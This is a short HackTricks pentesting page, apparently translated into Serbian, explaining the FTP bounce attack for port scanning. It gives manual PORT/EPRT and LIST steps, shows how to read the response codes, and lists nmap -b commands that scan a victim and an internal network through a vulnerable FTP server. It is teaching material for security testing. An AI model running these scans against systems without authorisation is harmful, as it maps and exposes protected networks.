FTP Bounce attack - Scan
Reading time: 2 minutes
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
FTP Bounce - Skeneranje
Ručno
- Povežite se na ranjivi FTP
- Koristite **
PORT
** iliEPRT
(ali samo jedan od njih) da uspostavite vezu sa <IP:Port> koji želite da skenirate:
PORT 172,32,80,80,0,8080
EPRT |2|172.32.80.80|8080|
- Koristite
LIST
(ovo će samo poslati povezanoj <IP:Port> listu trenutnih fajlova u FTP folderu) i proverite moguće odgovore:150 File status okay
(To znači da je port otvoren) ili425 No connection established
(To znači da je port zatvoren) - Umesto
LIST
možete takođe koristitiRETR /file/in/ftp
i tražiti sličneOpen/Close
odgovore.
Primer korišćenja PORT (port 8080 od 172.32.80.80 je otvoren, a port 7777 je zatvoren):
Isti primer korišćenja EPRT
(autentifikacija izostavljena na slici):
Otvoren port koristeći EPRT
umesto LIST
(drugo okruženje)
nmap
bash
nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.